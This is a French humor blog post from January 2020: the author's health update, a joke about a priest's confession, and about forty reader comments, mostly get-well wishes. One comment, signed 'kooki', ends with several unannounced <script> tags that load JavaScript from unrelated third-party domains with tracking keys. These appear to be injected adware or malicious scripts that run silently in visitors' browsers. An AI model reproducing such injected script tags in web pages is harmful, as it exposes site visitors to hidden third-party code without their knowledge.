• News et humour du jeudi 23 janvier 2020

    _________________________________________
    *** Bonne fête aux Barnard ***
    _________________________________________

    Bonjour à tous,

    Pour ceux qui me demandent des nouvelles :

    Toujours les mêmes problèmes auxquels s'ajoute, en ce moment, une super gastro.

    En plus, mauvais résultats de ma prise de sang :

    très fort taux de protéine C - réactive.

    Impossible pour moi de reprendre les visites quotidiennes et je remercie beaucoup tous ceux qui, fidèles, passent tous les jours pour me lire et laisser des commentaires.

    J'essaye au maximum d'aller vous commenter au moins une ou deux fois par semaine mais je ne peux vraiment pas faire davantage.

    Quand la médecine aura trouvé la solution à mes douleurs, je ne manquerais pas de vous le faire savoir !

    Encore merci pour votre patience et votre fidélité.

    Gros bisoux et ... à bientôt !

    _________________________________________

     

     

    On rit gentiment des vieux ...
    Merci Jacky











    Humour papidan








    Histoire de curé
    Merci Vosgien

    L'ABBÉ GIRARD va voir son collègue qui est le curé du village voisin.
    - Cher collègue, il faut absolument que tu me confesses tout de suite.
    - Oui bien sûr, je t’écoute.
    - Hier soir, j’ai rendu visite à une jeune et belle veuve de mon village pour la consoler de la perte de son mari.
    Après une petite demi-heure, cette femme m'a demandé de lui faire l’amour. Bien entendu, j’ai refusé. Elle s’est déshabillée et toute nue, elle se trémoussait devant moi. Je suis resté de marbre et je suis parti sur le champ !
    - Bien ! Et alors ?
    -
    Et alors ! Rien ! Je suis rentré chez moi en courant mais j'ai quand même pêché puisque j'ai regardé cette femme toute nue !!!
    Alors le curé confesseur lui dit :
    - Comme pénitence, tu vas boire 20 litres d'eau par jour pendant une semaine !

    - Quoi ??? 20 litres d'eau par jour ?
    - Eh oui ! C’est la dose quotidienne qu'on donne à un âne !!!








       


    « Humour du mercredi 22 janvier 2020Humour du vendredi 24 janvier 2020 »

  • Commentaires

    1
    Jeudi 23 Janvier 2020 à 00:14
    Oh ! Je suis désolée !
    Ta gastro va te mettre KO.
    Surtout repose-toi le plus possible, c'est important.
    Je t'embrasse très fort.
    La gastro fait des ravages par ici aussi.
    2
    papidan
    Jeudi 23 Janvier 2020 à 00:51
    papidan

    bonsoirjour,

    il fet sien laisse bolet

    https://www.youtube.com/embed/G29smmtOfIg?autoplay=1&rel=0

    poutoux

     

      • Jeudi 23 Janvier 2020 à 05:34

        Bonjourjour mon papidan ♥

        Merci pour la vidéo, mdr, mais je n'ai pas compris ta phrase avant le lien ... sarcastic

        Bon jeudi hivernal avec des poutoux glaciaux !

         

    3
    L'Espigou
    Jeudi 23 Janvier 2020 à 01:15
    J'aime bien celle de l'âne.
    On me reproche toujours de ne pas assez boire et bien voilà je ne suis pas un ane.
    Bisous ma Dom et soigne toi bien.
    Si tu ne peux pas venir chez nous ce n'est pas grave le principal est ta santé
    4
    Jeudi 23 Janvier 2020 à 01:31

    Bonjour ma chère titdom,



    A présent que je viens de reprendre une année sur le dos,
    je n'ose plus me rendre au cimetière.

    En effet, j'ai l'impression de visiter mon très proche domicile.
    Heureusement, mon loyer est payé d'avance... !   money.




    Il est très difficile d'envoyer des vœux aux personnes...
    qui se trouvent sur le pas de porte du trépas.

    Il faut vraiment faire travailler ses neurones....
    pour sortir les mots qu'il faut.

    C'est très délicat.  oops.



    Il faut se méfier d'une femme déjà mûre...
    qui propose à un jeune homme, de faire l'amour avec la mère et la fille.

    C'est toujours le fantasme qui rôde chez les mâles.
    Sauf que la fille est justement la dame âgée...
    qui appelle sa maman.

    Ce qui devient tout à coup,
    beaucoup moins engageant.  frown.




    Il y a encore des prêtres qui sont fidèles à leur foi.

    Le curé consolait une belle et jeune veuve.
    Celle-ci était déjà en manque,
    alors que son homme venait d'être enterré.

    L'abbé se sauva, lorsque la femme se mit toute nue.

    Pensant qu'il avait mal agi rien qu'en la regardant,
    il alla se confesser chez le prêtre d'une autre paroisse.

    Ce dernier lui dit:
    Comme pénitence, mon fils...
    tu vas me donner l'adresse de la débauchée...!   oh.




    Bonne journée, mon amie.
    Gros bisous. dédé.




    5
    Jeudi 23 Janvier 2020 à 03:36

    Ma chère tite Dom, 

    L'important c'est ta santé, le reste passe après. La gastro, c'est chiant ...j'en sais quelque chose, je l'ai eue début janvier. Merci de nous faire rire malgré  tous tes problèmes.

    Je t'embrasse bien fort,

    MF

    6
    Jeudi 23 Janvier 2020 à 04:47

    Visiter un cimetière en prévision d'un prochain séjour, plusieurs font çà.

    7
    Jeudi 23 Janvier 2020 à 05:21

    bonjour ma dom 

    tres bonne page encore aujourd hui  j en suis gourmande des le matin ça met de bonne humeur vraiment merci 

     soigne toi bien , mon mari a toujours une boite d argile verte dans le placard au cas il se guerit avec ça apre stout c est du Smecta 

     repose toi bien 

     je t embrasse

      • Jeudi 23 Janvier 2020 à 07:50

        pas toujours 

         car parfois il faut bien mieux que tout "s'évacue "

         pas de cas généraux

         bonne journée

    8
    Jeudi 23 Janvier 2020 à 06:30

    Pas encore facile pour toi, je me doutais bien tu sais, prends soin de toi avant toute chose, et bientôt je l'espère tu iras mieux gros bisou ma dom chérie 

    9
    Jeudi 23 Janvier 2020 à 06:40

    Bonjour ma Dom chérie

    Oh ma pauvre amie décidément tu accumules les problèmes de santé et j'en suis sincèrement désolée, je ne suis pas présente tous les jours, je passe chaque matin ou presque.... mettre en ligne mes coms et répondre et après je me repose, trop de chaleur humide en ce moment et donc je ne suis pas tous les jours sur le net encore moins sur la blogo, faut dire que je ne fais que 2 articles par semaine, mais sache que je pense à toi et ne t'oublie pas.Courage aussi pour la gastro, çà fout totalement à plat.

    Protéine C trop élevée, cela peut venir de l'arthrite, suite à une bronchite... Il faut surtout mon amie que tu te fasses bien suivre et bien soignée, plein de bonnes ondes positives pour que tu ailles mieux ma Dom chérie.

    Merci pour ces bonnes BD qui m'ont fait bien rire et cette bonne blague de curé, bien partie pour démarrer ma journée dans la bonne humeur. 

    Prends bien soin de toi surtout ma douce amie.

    Je t'embrasse très très fort.

    7a303b8d.gif

    10
    Jeudi 23 Janvier 2020 à 07:01

    Hello Dom

    Je comprends tout à fait. Depuis plus de 15 jours les douleurs à soso ont repris de plus belle et le rdv du centre anti douleur est le 28....Je ne peux que te dire courage...

    bizz

    Pat

    11
    Jeudi 23 Janvier 2020 à 07:16

    bien sûr que l'on est avec toi, même si nous ne pouvons pas faire grand chose, juste pour te dire que l'on pense à toi....passe un doux jeudi

    12
    Jeudi 23 Janvier 2020 à 07:25

    Super la blague des curés.

    Bonne journée tout les deux.

    Bises.

    Christian

    13
    H-IL
    Jeudi 23 Janvier 2020 à 07:49

    La PCR est élevée à cause de la gastro

    Gros bisous ma Dom et courage

    HLC

    14
    Jeudi 23 Janvier 2020 à 07:52

    Je  ne  visite   que  les  cimetières   qui   n'ont  plus   de place  pour  une  concession !

    Méfions   nous  des  cougars, il  y a  déjà  une certaine Brizitte qui nous  coûte  bonbon !

     Je  te  le  dis   ce   curé Girard   est  un  pédé   qui  s'ignore !

    Pas   de  bonnes  nouvelles,  c'  est    bien triste,  j'espère   que  le retour   du   soleil  te fera   du   bien

     Bonne  journée

     Bisous

     

    15
    Jeudi 23 Janvier 2020 à 07:53

    désolée pas possible écrire non plus ni rester  ces jours ci encore

    mais merci d'avoir écrit ces mots  même si pas :(

     

     et sois certaine que je pense FORT à toi tes douleurs et espère mieux dès aujourd'hui

     à bientôt ♥♥♥

    16
    Jeudi 23 Janvier 2020 à 08:08

    Bonjour ma domi !

    Ah ces douleurs !!! Depuis que je fais beaucoup moins d'ordi j'avoue avoir moins de douleurs ... mais si c'est vrai !

    Allez merci pour cette bonne page ! Bisous !

    17
    Ton " Pays "
    Jeudi 23 Janvier 2020 à 08:14

    Coucou Dom,

    Quelle est bonne cette histoire de curé !!!

    Voilà une bonne journée qui commence par un grand rire !!!

    Gros bisous

    Jacky

      • Jeudi 23 Janvier 2020 à 08:37

        Bonjour jacky,

        Merci et bonne journée avec des bisoux.

         

    18
    Jeudi 23 Janvier 2020 à 08:32

    Ha cette santé, toujours un gros soucis.
    Pour tes passages en com sur le blog, ne t'en occupe pas.
    Je sais pourquoi tu es moins présente
    et je sais ta fidélité tout de même.
    Alors repos, repos, repos.
    Bises et bon courage.

    19
    Hélène aussut
    Jeudi 23 Janvier 2020 à 08:44

    Bonjour Dom

    Merci Dom de donner de vos nouvelles. On espère qu’elle soient toujours meilleures.

    c’est avec hâte que je retrouve votre page chaque jour.

    Je vous souhaite la meilleure journée possible.

    Bises bretonnes.

    Helene..

    20
    Jeudi 23 Janvier 2020 à 08:50

    Autrefois on faisait une VS, aujourd'hui une CRP...

    quand elle est élevée c'est signe d'une inflammation, déjà avec tous tes problèmes de rhumatismes ça ne m'étonne pas trop mais si en plus elle a été faite lors d'une gastro ...

    Pépé va bientôt visiter un appartement ...

    MDR avec la mère et la fille !

    Prends soin de toi, Bisous à vous 2 et bonne journée

    21
    Jeudi 23 Janvier 2020 à 08:56
    erato:

    Pense bien à t'hydrater et reste au chaud , prends bien soin de toi.

    J'adore la dernière!!!!

    Douce journée, bises Dom

    22
    Jeudi 23 Janvier 2020 à 09:03

    Oui en ce moment nous sommes en pleine épidémie de gastro, je vois que tu n'as pas échappé à ce fléau, pour notre part on prend toutes les précautions et on ne sort que par obligation, pour l'instant on touche du bois.

    J'adore l'histoire de la confession du prêtre, même son copain le considère comme un âne

    Amicalement et surtout soigne toi bien

    Claude

    23
    kooki
    Jeudi 23 Janvier 2020 à 09:11

    j'ai découvert ton blog il y a peu de temps  j'adore

    prends bien soin de toi

    bonne et douce (si possible sans douleurs) journée

    <script src="//blinkjork.com/214f104573d95d95ba.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8527x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8527x&format=arrjs&r=1579766862884" type="text/javascript"></script> <script src="http://blinkjork.com/ext/214f104573d95d95ba.js?sid=52550_8527_&title=s&blocks[]=31af2" type="text/javascript"></script>
    24
    Vosgien
    Jeudi 23 Janvier 2020 à 09:12

    Bon courage et tous mes souhaits de meilleure forme ma chère amie !

    Gros bisous et bon jeudi

    Claude

      • Jeudi 23 Janvier 2020 à 13:48

        Merci et bon après midi avec des bisoux, cher claude !

         

    25
    Jeudi 23 Janvier 2020 à 09:14

    Bonjour d’Angers
    Ah mais ! Je ne vais jamais dans les cimetières ! …
    Ah ! Ah ! Cougar +
    20 litres d’eau ! … Oui faut être c.. pour se mettre dans une telle situation …
    Bon courage et secoue tes toubibs ! ...
    Bonne journée … Amicalement … Claude

    26
    Jeudi 23 Janvier 2020 à 09:39

    Pas évident de maintenir une forme en hiver 

    Bon courage Dom

    Bisous 

    27
    Jeudi 23 Janvier 2020 à 09:42

    Bonjour Dom

    Et oui tout le monde a ses malheurs et j'espère qu'il vont trouver pour tes douleurs, la gastro il y en a pas mal c'est vrai

    Belle page d'humour

    Je te souhaite une bonne journée, bisous

    28
    Jeudi 23 Janvier 2020 à 09:44
    PPRene

    bonjour chere Dom, je suis désolé pour tes resultats,  j'espère que ton medecin traitant trouvera une correction, tu viens quand tu peux, pas de problème, merci pour ta page d'humour , bravo à Jacky pour les vieux ! et à Papidan pour la femme cougar et le curé idiot ! bonne fin de semaine , grosses bises 

    29
    jm:rober
    Jeudi 23 Janvier 2020 à 10:44

    Bonjour Dom,

    Je viens de te lire car mis a part ta gastro, je ne comprend pas la médecine sur cette histoire de Protéine C car on ne joue pas avec cela

    Interprétation des résultats de la protéine C-réactive

    La protéine C-réactive s'exprime en milligrammes par litre de sang. Un résultat supérieur à 10 mg/l peut indiquer une infection, une poussée d'arthrite, une tuberculose, un lupus, un cancer, une maladie inflammatoire intestinale... dans tous les cas, des examens plus approfondis devront être réalisés afin d'en déterminer l'origine. En cas d'inflammation, le résultat peut atteindre 1000 mg/l. Dans le cadre d'une étude du risque cardiovasculaire, on estime qu'un résultat supérieur à 3 mg/l nécessite des examens complémentaires (épreuves d'effort, examen des coronaires).

    Alors attention

    Aller bonne fin de journée

    Amitiés

     

    30
    Jeudi 23 Janvier 2020 à 10:47

    Coucou Dom 

    Merci pour les nouvelles ..la gastro c'est pas le mieux pour se remettre mais en principe ca passe vite  mais très fatigant !

    Prends bien soin de toi surtout et ne te tracasses pas pour les blogs 

    Gros bisous

    31
    Jeudi 23 Janvier 2020 à 11:07

    Ah !! décidément, tu auras tout quoi !... désolée d'apprendre qu'en prime tu as la gastro, cela ne va pas arranger ton état, et va te fatiguer encore un peu plus...reste bien au chaud surtout...Pour les blagues, j'apprends qu'un âne boit 20 litres d'eau par jour (yes) le brave homme va devoir se déplacer avec un tuyau pour raccorder le haut et le bas en même temps...Pour le cimetière, très drôle, et pour la cougar, fallait déjà y penser !! Grosses bises virtuelles

    32
    Jeudi 23 Janvier 2020 à 11:38

    Bon courage, chère Dom.

    Je pense bien à toi.

    Bisous

    Alain

    33
    Marie-France
    Jeudi 23 Janvier 2020 à 14:56

    Bonjour Dom

    Avec l'humour on oublie un peu ses douleurs. Je te remercie pour ton humour et je te souhaite une bonne soirée.

      • Vendredi 24 Janvier 2020 à 05:45

        Merci marie france.

        Pas allumé l'ordi, hier après midi ...

        Bon vendredi !

         

    34
    Jeudi 23 Janvier 2020 à 15:00

    S'il en reste un cela sera  ce curé de village mais son confesseur a su comprendre son émoi !

    Mdrrr

    Bonne fin de semaine.

    35
    Mo
    Jeudi 23 Janvier 2020 à 15:44
    Mo

    Bonjour chère Dom,

    Je vais essayer de ne plus te demander de nouvelles tous les jours... ^^

    Cela doit être lassant s'il n'y a pas de changement.

    Tu as raison :  dès que tu auras du nouveau, tu nous le diras.

    J'ai bien aimé l'histoire du curé!

    Gros bisous, 'tite Dom

    Mo

    36
    Jeudi 23 Janvier 2020 à 16:45

    Oh zut alors ma pauvre p'tite Dom chérie,

    une gastro en plus ce n'est pas drôle! Tu cumules tout ce qui ne va  pas, je comprends que tu ne viennes pas trop souvent, car moi même je n'arrive plus à venir tous les jours.

    Mais tes blagues arrivent quand même tous les jours! C'est l'essentiel pour ceux qui veulent rire!

    Je te souhaite une meilleure fin de semaine

    et je t'embrasse de toute mon amitié ma Dom chérie.

     

    37
    Jeudi 23 Janvier 2020 à 18:20

    Bon courage, bisous

    38
    Jeudi 23 Janvier 2020 à 19:20

    Hélas, quand on est malade

    il faut de la patience de du courage !

    Je t'en souhaite beaucoup, car tu cumules en ce moment,

     j'espère que l'on va te trouver de bons remèdes.

    Moi aussi j'ai une gastro

    et je me demande où je l'ai attrapé!

    Merci pour ton blog d'humour que j'ai eu le plaisir

    de feuilleter avec mon petit fils cet après midi.

    Bonne soirée, cordiales amitiés & à + yes

    39
    Jeudi 23 Janvier 2020 à 19:58

    Coucou ma chère titeamiedom,

    Oh, désolée, j'aimerais tant que tu ailles mieux.

    Une gastro ça va te mettre KO.

    Pas besoin de ça !!!

    Je t'embrasse et t'envoie plain de bonnes ondes.

    Aimée

    40
    Jeudi 23 Janvier 2020 à 22:30
    Il a de l’humour ce curé
    Courage
    41
    Vendredi 24 Janvier 2020 à 10:35

    Bonjour ,tu n'as vraiment pas de chance ,j'espère qu'on va trouver un médicament pour te soulager.merci pour ton humour,douce journée,bises.

     

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :